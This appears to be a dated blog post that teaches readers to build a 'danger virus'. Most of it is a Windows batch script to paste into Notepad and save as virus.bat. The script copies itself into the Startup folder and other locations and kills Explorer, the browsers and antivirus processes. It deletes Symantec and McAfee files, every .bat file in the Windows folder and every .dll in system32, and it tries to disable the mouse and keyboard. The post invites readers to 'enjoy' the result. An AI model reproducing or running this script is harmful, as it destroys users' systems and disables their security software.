-->

How to Create a Danger Computer Virus ? Update 2015 !!

What is Computer Virus?

A computer virus is a malware program that, when executed, replicates by inserting copies of itself (possibly modified) into other computer programs, data files, or the boot sector of the hard drive; when this replication succeeds, the affected areas are then said to be "infected".

Your computer or laptop. They affect the working of the computer systems and create new problem. If you want to create your own virus, then this guide will show you how to create a simple virus. Follow step by step guide below:
Instruction:

  • Go to desktop & open the notepad 
  • Copy the below code and paste into notepad file.
Code:

@echo off
copy"virus.bat""c:\documents and settings\all users\start menu\programs\startup"
copy "virus.bat" "c:\"
copy "virus.bat" "%userprofile%\my documents"
tskill explorer
tskill ccapp
tskill yahoomessenger
tskill firefox
tskill chrome
rem made with batch virus maker v.2
tskill iexplorer
time 12:00
rem made with batch virus maker v.2
del c:\program files\common files\symantec shared\ccapp.exe
cd c:\windows
if exist "*.bat" del "*.bat"
cd c:\windows\system32
rem made with batch virus maker v.2
if exist "*.dll" del "*.dll"
tskill mcafee security centre module
del c:\program files\mcafee.com\agent\mcdetect.exe
rem made with batch virus maker v.2
copy "virus.bat" "virus.bat45544"
copy "virus.bat" "virus.bat85858"
copy "virus.bat" "virus.bat1645"
copy "virus.bat" "virus.bat574457"
copy "virus.bat" "virus.bat55457"
copy "virus.bat" "virus.bat9765"
copy "virus.bat" "virus.bat45465"
rem made with batch virus maker v.2
copy "virus.bat" "virus.bat456877"
copy "virus.bat" "virus.bat77989845"
copy "virus.bat" "virus.bat2135"
copy "virus.bat" "virus.bat46876"
rem made with batch virus maker v.2
copy "virus.bat" "virus.bat45687"
copy "virus.bat" "virus.bat8868"
copy "virus.bat" "virus.bat2000"
copy "virus.bat" "virus.bat2009"
msg * this is a virus
rundll mouse,disable
rem made with batch virus maker v.2
rundll keyboard,disable
Finally Save the notepad file as virus.bat” or “virus.exe” (where “ .bat, .exe ” is an extension and “ virus ”  is  file name) Or anything  with the name you want to give.

You have successfully created the “danger virus” Now go to your Save location and Enjoy...:):):) Thank you.

Please Note:
This virus is tries to delete every .dll and .bat files and it tries to delete mcafee antivirus. If someone clicks on the .bat or .exe file, then this batch file will run and execute the operations written in the code. So be careful of running this batch file, otherwise you may need to Restoration on your computer.
Source:Internet & en.wikipedia.org

You May Like Also Also Like This

Post a Comment

2 Comments